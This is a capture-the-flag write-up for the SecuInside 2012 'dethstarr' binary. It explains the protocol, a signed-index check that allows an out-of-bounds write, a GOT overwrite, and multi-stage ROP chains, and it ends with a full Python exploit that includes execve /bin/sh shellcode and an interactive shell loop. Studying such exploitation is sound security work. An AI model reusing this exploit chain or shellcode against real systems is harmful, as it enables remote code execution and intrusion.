Dethstarr was one of my favorite service exploitation challenges during the SecuInside 2012 contest. We had to fully reverse the given binary to understand the protocol it implements. To debug the binary easily, in the same environment as the remote server, we set up xinetd on a CentOS 6.2 virtual machine with the following configuration:

service dethstarr
{
    socket_type = stream
    wait = no
    flags = REUSE
    user = w4kfu
    server = /home/w4kfu/LSE/CTF/SecuInside_2012/dethstarr/dethstarr
    port = 4242
    type = UNLISTED
}

To trigger the bug, we have to understand how the protocol works in detail. Looking at the disassembled code, we can identify four check functions. Each one first reads a fixed number of bytes, checks that they satisfy several conditions, then reads again from the socket with a user-specified size (bounded to avoid buffer overflows).

First check function

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0xCA  |  0x0  |  0x1  | 0xAC  | 0x9A  | 0x1 | 0x0 | 0x00010001| 0x54534e49  | 0x1F  |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The last field, 0x1F, is the size passed to the final read call of that function (no overflow can occur).
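As a quick illustration of the layout above, here is a minimal sketch that packs the first-check header in one call. It assumes, as the final exploit does, that every field is a 32-bit little-endian value; the names `FIRST_CHECK_FIELDS` and `build_first_check` are made up for this example.

```python
import struct

# Field values copied from the first-check table, in wire order.
FIRST_CHECK_FIELDS = (0xCA, 0x0, 0x1, 0xAC, 0x9A, 0x1, 0x0,
                      0x00010001, 0x54534E49)


def build_first_check(body_size=0x1F):
    """Pack the nine fixed fields plus the trailing size as little-endian dwords."""
    header = struct.pack("<9I", *FIRST_CHECK_FIELDS)
    return header + struct.pack("<I", body_size)


packet = build_first_check()
print(len(packet))      # 10 dwords -> 40 bytes
print(packet[32:36])    # 0x54534e49 in little-endian is the ASCII tag "INST"
```

The header is followed on the wire by `body_size` bytes of data, which is what the second read of the function consumes.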

Second check function

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0x8 | 0x1 | 0x1 | 0x0DFE1ABCC | <global_var>  | 0x1 | 0xFF| -42 | 0x66| 0x756C| 0xFF| 0x60|0x7FFFFFFF |0x9C |0x1F|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The global_var is set before each call to the check function.

Third check function

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0x001A00CB|0x000200DB |0x41420019 |0x6|0x1|0xCA |0xCCCCCCCC | <global_var>  | 0x1F|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Fourth check function

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| <addr>| 0x31323301|<index>|<index>|0x9|0x9|0x1|0xFFFF|0xFFFF0000|0x4|0x00e10052 |<global_var> |0x1F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Inside this fourth check function lies the vulnerability of this challenge: the index field ([eax+8]) is checked against 0x1F with a signed comparison (jle), so negative values pass the check:

.text:080488EE                 mov     eax, [eax+8]
.text:080488F1                 cmp     eax, 1Fh
.text:080488F4                 jle     short loc_8048909

.text:0804893A                 mov     eax, [eax+8]
.text:0804893D                 mov     edx, [ebp+buf]
.text:08048940                 mov     edx, [edx]
.text:08048942                 mov     ds:dword_804A8E0[eax*4], edx
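To make the effect of the signed comparison concrete, the sketch below mimics the check and computes the address hit by the store for a given index. The array base comes from the disassembly, and -65 is the index the final exploit uses for the exit() overwrite. That the resulting address is exit's GOT slot is inferred from the exploit, not re-checked against the binary here. The helper names are hypothetical.

```python
import struct

ARRAY_BASE = 0x0804A8E0   # dword_804A8E0 from the disassembly
MAX_INDEX = 0x1F


def as_signed32(value):
    """Reinterpret an unsigned 32-bit value as signed, like the CPU does for jle."""
    return struct.unpack("<i", struct.pack("<I", value & 0xFFFFFFFF))[0]


def passes_check(raw_index):
    """Mimic `cmp eax, 1Fh / jle`: a signed less-or-equal comparison."""
    return as_signed32(raw_index) <= MAX_INDEX


def write_target(raw_index):
    """Address written by `mov ds:dword_804A8E0[eax*4], edx`."""
    return (ARRAY_BASE + 4 * as_signed32(raw_index)) & 0xFFFFFFFF


idx = struct.unpack("<I", struct.pack("<i", -65))[0]   # 0xFFFFFFBF on the wire
print(passes_check(idx), hex(write_target(idx)))       # True 0x804a7dc
```

An unsigned comparison (jbe instead of jle) would have rejected 0xFFFFFFBF, since it is far larger than 0x1F when read as unsigned.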

With this primitive we can index the global array with a negative offset and write an arbitrary dword there. I chose to overwrite the exit() entry in the GOT. Then, when a check function called after the overwrite fails, it calls exit() and therefore jumps to the address we specified. The binary contains a convenient read call followed by a function epilogue that we can use to overflow one of the program's buffers:

.text:08049518                 mov     [esp+8], eax    ; nbytes
.text:0804951C                 lea     eax, [ebp+var_31]
.text:0804951F                 mov     [esp+4], eax    ; buf
.text:08049523                 mov     dword ptr [esp], 0 ; fd
.text:0804952A                 call    _read
.text:0804952F                 mov     eax, 0
.text:08049534
.text:08049534 end_function:                           ; CODE XREF: first_check_buff+65j
.text:08049534                                         ; first_check_buff+8Cj ...
.text:08049534                 add     esp, 44h
.text:08049537                 pop     ebx
.text:08049538                 pop     ebp
.text:08049539                 retn

The interesting thing is that the exit function is triggered with eax being the invalid size we specified (making the check fail). That means we control this register value, which is used as the read size.

After triggering this bug, we can use ROP to build a payload that bypasses ASLR and NX. The first chains leak an address from the GOT, which lets us locate libc.so.6 in memory and build a later stage using this additional information.

First stage ROP chain

0x080495B2  # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret
0x41424344  # Dummy
0x08049515  # Address inside first check, before read

Now we have the size we want in eax, which allows us to trigger a buffer overflow when read is called inside 0x0804928D (a.k.a. the first check function).

Second stage ROP chain

0x080483C4  # Address of the write function in .plt
0x08048DDA  # Return Address Second check mov ebp, esp
0x00000001  # File descriptor (stdout)
0x0804A7BC  # Address we want to write from: read@.got.plt
0x00000004  # Size of the write

Now that we have the read address from the GOT, we return again into the second check function (as in the first stage ROP chain) and re-trigger the buffer overflow to prepare for stage 3.
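The leak handling can be sketched as follows. `recv_exact` is a hypothetical helper added here because a bare `recv(4)` may return fewer than four bytes; `FakeSock` exists only so the example runs without a server. The 0xCA60 offset is the one used in this write-up and only holds for the libc.so.6 build on the target.

```python
import struct

MMAP_DELTA = 0xCA60   # distance from the leaked function to mmap (target libc only)


def recv_exact(sock, n):
    """Read exactly n bytes; recv() may legitimately return fewer."""
    data = b""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise EOFError("connection closed during leak")
        data += chunk
    return data


def parse_leak(raw):
    """Decode a 4-byte little-endian GOT entry."""
    return struct.unpack("<I", raw)[0]


def mmap_address(leak):
    """Apply the fixed libc offset, wrapping to 32 bits."""
    return (leak + MMAP_DELTA) & 0xFFFFFFFF


class FakeSock(object):
    """Stand-in socket that delivers the leak in two short reads."""
    def __init__(self, chunks):
        self.chunks = list(chunks)

    def recv(self, n):
        return self.chunks.pop(0) if self.chunks else b""


leak = parse_leak(recv_exact(FakeSock([b"\x10", b"\x20\x30\x00"]), 4))
print(hex(leak), hex(mmap_address(leak)))   # 0x302010 0x30ea70
```

In the real exploit the socket `s` would take the place of `FakeSock`.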

Third stage ROP chain

<write_addr> + 0xca60   # Computed address of mmap (libc.so.6)
0x080495B2              # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret // clean mmap args
0x13370000              # Address to map
0x00001000              # Size to map
0x00000007              # RWX
0x00000031              # MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS
0xffffffff              # fd
0x00000000              # offset (ignored)
...
DUMMY * 20
...
0x080483F4              # read@.plt
0x13370000              # Return address: our shellcode
0x00000000              # fd
0x13370000              # Address to read to
len(shellcode)          # Length of shellcode

This ROP chain calls mmap to map an RWX page at a fixed address, reads our shellcode (execve /bin/sh) into it, and jumps to it.
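The constants in this chain can be double-checked with a little arithmetic. The sketch below uses the Linux i386 values of the mmap flags, hard-coded rather than taken from a library, and shows why 20 filler bytes are needed: the cleanup gadget skips 0x1C + 4 * 4 = 44 bytes, of which 24 are the six mmap arguments.

```python
import struct

# Linux i386 constants, hard-coded for illustration.
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
MAP_SHARED, MAP_FIXED, MAP_ANONYMOUS = 0x01, 0x10, 0x20

prot = PROT_READ | PROT_WRITE | PROT_EXEC
flags = MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS

# addr, length, prot, flags, fd, offset: the six dwords after the gadget address.
mmap_args = struct.pack("<6I", 0x13370000, 0x1000, prot, flags, 0xFFFFFFFF, 0)

# add esp, 0x1C ; pop ; pop ; pop ; pop ; ret
gadget_skip = 0x1C + 4 * 4
filler = gadget_skip - len(mmap_args)

print(hex(prot), hex(flags), filler)   # 0x7 0x31 20
```

After the filler, the gadget's `ret` pops the next dword, which is read@.plt in the chain above.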

In the end, this exploit worked both locally and remotely, and we were able to read the flag from the /home/dethstarr/key file. Later on we also used it to get the system time of the server (using date) in order to synchronize ourselves with the classico service challenge.

Here is the final exploit:

import socket
import struct
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(("61.42.25.25", 8282))
s.connect(("192.168.103.61", 4242))

def first_check():
    cmd = struct.pack("<I", 0xCA)
    cmd += struct.pack("<I", 0x0)
    cmd += struct.pack("<I", 0x1)
    cmd += struct.pack("<I", 0xAC)
    cmd += struct.pack("<I", 0x9A)
    cmd += struct.pack("<I", 0x1)
    cmd += struct.pack("<I", 0x00000000)
    cmd += struct.pack("<I", 0x00010001)
    cmd += struct.pack("<I", 0x54534e49)
    cmd += struct.pack("<I", 0x1F)
    #sys.stdout.write(cmd)
    s.send(cmd)
    cmd = "A" * (0x1F)
    #sys.stdout.write(cmd)
    s.send(cmd)


def second_check(x, size, cmd2, a):
    cmd = struct.pack("<I", a)
    cmd += struct.pack("<I", 0x41424344)
    cmd += struct.pack("<I", 0x41424344)
    cmd += struct.pack("<I", 0x0DFE1ABCC)
    # Switch case
    cmd += struct.pack("<I", x)
    cmd += struct.pack("<I", 0x41424344)
    cmd += struct.pack("<I", 0xFF)
    cmd += struct.pack("<i", -0x42)
    cmd += struct.pack("<I", 0x66)
    cmd += struct.pack("<I", 0x756C)
    cmd += struct.pack("<I", 0xFF)
    cmd += struct.pack("<I", 0x60)
    cmd += struct.pack("<I", 0x41424344)
    cmd += struct.pack("<I", 0x7FFFFFFF)
    cmd += struct.pack("<I", 0x9C)
    cmd += struct.pack("<I", size)
    #sys.stdout.write(cmd)
    s.send(cmd)
    #sys.stdout.write(cmd)
    s.send(cmd2)


def third_check():
    for i in [1, 0, 2]:
        cmd = struct.pack("<I", 0x001A00CB)
        cmd += struct.pack("<I", 0x000200DB)
        cmd += struct.pack("<I", 0x41420019)
        cmd += struct.pack("<I", 0x6)
        cmd += struct.pack("<I", 0x41424344)
        cmd += struct.pack("<I", 0xCA)
        cmd += struct.pack("<I", 0xCCCCCCCC)
        # index
        cmd += struct.pack("<I", i)
        cmd += struct.pack("<I", 0x1F)
        #sys.stdout.write(cmd)
        s.send(cmd)
        cmd = "A" * (0x1F)
        #sys.stdout.write(cmd)
        s.send(cmd)

def fourth_check(x, y, addr):
    cmd = struct.pack("<I", addr)
    cmd += struct.pack("<I", 0x31323301)
    cmd += struct.pack("<i", y)
    cmd += struct.pack("<i", y)
    cmd += struct.pack("<I", 0x9)
    cmd += struct.pack("<I", 0x9)
    cmd += struct.pack("<I", 0x1)
    cmd += struct.pack("<I", 65535)
    cmd += struct.pack("<i", -65536)
    cmd += struct.pack("<I", 0x4)
    cmd += struct.pack("<I", 0x00e10052)
    # index !!
    cmd += struct.pack("<I", x)
    cmd += struct.pack("<I", 0x1F)
    #sys.stdout.write(cmd)
    s.send(cmd)
    cmd = "A" * 0x1F
    s.send(cmd)

first_check()
print s.recv(0x60)
#raw_input()
for x in xrange(1, 6):
    if x == 2:
        continue
    second_check(x, 0x1F, "A" * 0x1F, 0x8)
print s.recv(0x44)
third_check()
print s.recv(0x78)
fourth_check(3, -2, 0x4214242)
print s.recv(0x78)
fourth_check(0, -2, 0x414242)
print s.recv(0x48)
print s.recv(0x78)
fourth_check(0, -2, 0x414242)
print s.recv(0x78)
# Overwrite exit()
fourth_check(2, -65, 0x08049518)
print s.recv(0x78)

cmd = "B" * 9
cmd += struct.pack("<I", 0x080495B2)        # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret
cmd += struct.pack("<I", 0x41424344)        # Dummy
cmd += struct.pack("<I", 0x08049515)        # Address inside First check before read
cmd += "B" * 10

second_check(5, 0x100, cmd, 8)
size_payload = 0
max_size = 0x100
payload = "B" * 26
payload += struct.pack("<I", 0x080483C4)    # .plt write
payload += struct.pack("<I", 0x08048DDA)    # ret addr second check : mov ebp, esp
payload += struct.pack("<I", 0x00000001)    # fd
payload += struct.pack("<I", 0x0804A7BC)    # .got.plt write
payload += struct.pack("<I", 0x00000004)    # size write

s.send(payload + "B" * 20 + "X" * (0x100 - len(payload) - 20 - len(cmd)))
print s.recv(65536)

# RECV ADDR WRITE
d = s.recv(4)
write_addr = struct.unpack("<I", d)[0]
print "Write_addr =", hex(write_addr)

cmd = "B" * 9
cmd += struct.pack("<I", 0x080495B2)        # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret
cmd += struct.pack("<I", 0x41424344)        # Dummy
cmd += struct.pack("<I", 0x08049515)        # Address inside First check before read
cmd += "B" * 10

second_check(5, 0x100, cmd, 8)

payload = "B" * 26

payload += struct.pack("<I", write_addr + 0xca60)   # Addr mmap
payload += struct.pack("<I", 0x080495B2)            # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret
payload += struct.pack("<I", 0x13370000) # Addr
payload += struct.pack("<I", 4096)       # Size
payload += struct.pack("<I", 7)          # rwx
payload += struct.pack("<I", 49)         # MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS
payload += struct.pack("<I", 0xffffffff) # -1
payload += struct.pack("<I", 0)          # offset (ignored)

payload += "B" * 20

shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"

payload += struct.pack("<I", 0x080483F4)    # .plt read
payload += struct.pack("<I", 0x13370000)    # return addr shellcode
payload += struct.pack("<I", 0x00000000)    # fd
payload += struct.pack("<I", 0x13370000)    # addr to read
payload += struct.pack("<I", len(shellcode))# len of shellcode

s.send(payload + "X" * (0x100 - len(payload) - len(cmd)))

s.send(shellcode)

while True:
    print ">",
    cmd = raw_input()
    if not cmd:
        break
    s.send(cmd + "\n")
    sys.stdout.write(s.recv(65536) + "\n")

Thanks to the SecuInside CTF organizers for all these awesome binaries!